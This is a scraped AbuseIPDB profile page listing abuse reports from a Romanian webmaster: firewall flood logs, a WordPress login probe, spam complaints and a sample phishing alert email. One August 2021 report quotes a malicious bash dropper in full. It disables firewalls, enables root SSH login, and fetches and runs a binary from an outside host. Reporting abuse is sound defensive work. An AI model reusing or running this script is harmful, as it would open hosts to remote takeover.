cclmed - AbuseIPDB User Profile

AbuseIPDB - IP Address Blacklist

Check an IP Address, Domain Name, or Subnet

e.g. 35.170.82.159, microsoft.com, or 5.188.10.0/24

User cclmed, the webmaster of cclmed.ro, joined AbuseIPDB in November 2020 and has reported 10 IP addresses.

Standing (weight) is good.

INACTIVE USER WEBMASTER SUPPORTER

IP	Date	Comment	Categories
185.53.199.57	20 Aug 2021	2021-08-20T04:30:30+03:00 <warning>kernel: [1596276.584726] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DS ... show more2021-08-20T04:30:30+03:00 <warning>kernel: [1596276.584726] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=185.53.199.57 DST=86.123.254.215 LEN=124 TOS=0x18 PREC=0x20 TTL=51 ID=5681 DF PROTO=UDP SPT=9140 DPT=61724 LEN=104 MARK=0xff00 2021-08-20T04:30:30+03:00 <warning>kernel: [1596276.585386] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=185.53.199.57 DST=86.123.254.215 LEN=124 TOS=0x18 PREC=0x20 TTL=51 ID=5680 DF PROTO=UDP SPT=8577 DPT=63296 LEN=104 MARK=0xff00 show less	DDoS Attack Port Scan
103.100.143.47	08 Aug 2021	#!/bin/bash #chkconfig: 2345 88 14 SHELL=/bin/sh PATH=/usr/local/sbin:/usr/loca ... show more#!/bin/bash #chkconfig: 2345 88 14 SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin function downloadyam() { /etc/init.d/iptables stop service iptables stop sUsEFirewall2 stopresUsEFirewall2 stop systemctl stop firewalld.service systemctl disable firewalld.service sed -i '/nameserver/d' /etc/resolv.conf echo "nameserver 8.8.8.8" >> /etc/resolv.conf needreset=1; iptables -I INPUT -p TCP --dport 1522 -j ACCEPT iptables -I INPUT -p TCP --dport 3307 -j ACCEPT iptables -I INPUT -p TCP --dport 6001 -j ACCEPT sed -i '/.PermitRootLogin/d' /etc/ssh/sshd_config sed -i '/PermitRootLogin/d' /etc/ssh/sshd_config echo "PermitRootLogin yes" >> /etc/ssh/sshd_config if [ ! -f "/bin/note" ]; then curl http://xia.beihaixue.com/s666.png -o /bin/note && chmod 0777 /bin/note if [ ! -f "/bin/note" ]; then wget http://xia.beihaixue.com/s666.png -O /bin/note && chmod 0777 /bin/note rm -rf note. fi nohup /bin/note & show less	Phishing Hacking Exploited Host SSH
106.75.34.62	26 Jun 2021	Unusual sign-in activity We detected something unusual about a recent sign-in to the effybiz. ... show moreUnusual sign-in activity We detected something unusual about a recent sign-in to the effybiz.com account [email protected] Sign-in details Country/region: Singapore IP address: 92.922.140.701 Date: 2021-06-21 8:41:59 GMT (SG) Platform: iOS Browser: - Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Please go to your recent activity page to let us know whether or not this was you. If this wasn't you, we'll help you to secure your account. If this was you, we'll trust similar activity in the future. show less	Email Spam
103.145.13.223	07 Jun 2021	2021-06-07T04:29:05+03:00 <warning>kernel: [1513982.263667] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DS ... show more2021-06-07T04:29:05+03:00 <warning>kernel: [1513982.263667] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=103.145.13.223 DST=86.123.254.215 LEN=429 TOS=0x08 PREC=0x20 TTL=53 ID=24028 DF PROTO=UDP SPT=5097 DPT=5382 LEN=409 MARK=0xff00 show less	DDoS Attack Port Scan
81.211.5.146	10 May 2021	2021-05-04T00:42:23+03:00 <warning>kernel: [1068017.733040] FIREWALL ICMP-FLOOD:IN=ppoe-wan1p OUT= D ... show more2021-05-04T00:42:23+03:00 <warning>kernel: [1068017.733040] FIREWALL ICMP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=81.211.5.146 DST=86.123.254.215 LEN=56 TOS=0x00 PREC=0x00 TTL=249 ID=0 PROTO=ICMP TYPE=11 CODE=0 [SRC=86.123.254.215 DST=91.243.35.12 LEN=41 TOS=0x00 PREC=0x00 TTL=1 ID=54575 DF PROTO=UDP SPT=19046 DPT=7777 LEN=21 ] MARK=0xff00 Numerous ICMP flood attacks show less	DDoS Attack Ping of Death Exploited Host
51.195.190.14	10 May 2021	2021-05-10T00:48:35+03:00 <warning>kernel: [1586805.515996] FIREWALL SYN-FLOOD:IN=ppoe-wan1p OUT= DS ... show more2021-05-10T00:48:35+03:00 <warning>kernel: [1586805.515996] FIREWALL SYN-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=51.195.190.14 DST=86.123.254.215 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=24481 PROTO=TCP SPT=56914 DPT=8430 WINDOW=1024 RES=0x00 SYN URGP=0 MARK=0xff00 This repeats multiple times per second at the main gateway show less	DDoS Attack Exploited Host
162.241.149.137	16 Feb 2021	162.241.149.137 - - [16/Feb/2021:08:33:30 +0200] "GET /wp-login.php HTTP/1.1" 404 6568 "http://cclme ... show more162.241.149.137 - - [16/Feb/2021:08:33:30 +0200] "GET /wp-login.php HTTP/1.1" 404 6568 "http://cclmed.ro/wp-login.php" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" show less	Web App Attack
63.80.191.81	30 Nov 2020	Continuous unsolicited marketing email for various products (possibly scam)	Email Spam
178.20.226.92	30 Nov 2020	Continuous unsolicited marketing emails for various products	Email Spam

** This Document Provided By AbuseIPDB **
Source: https://www.abuseipdb.com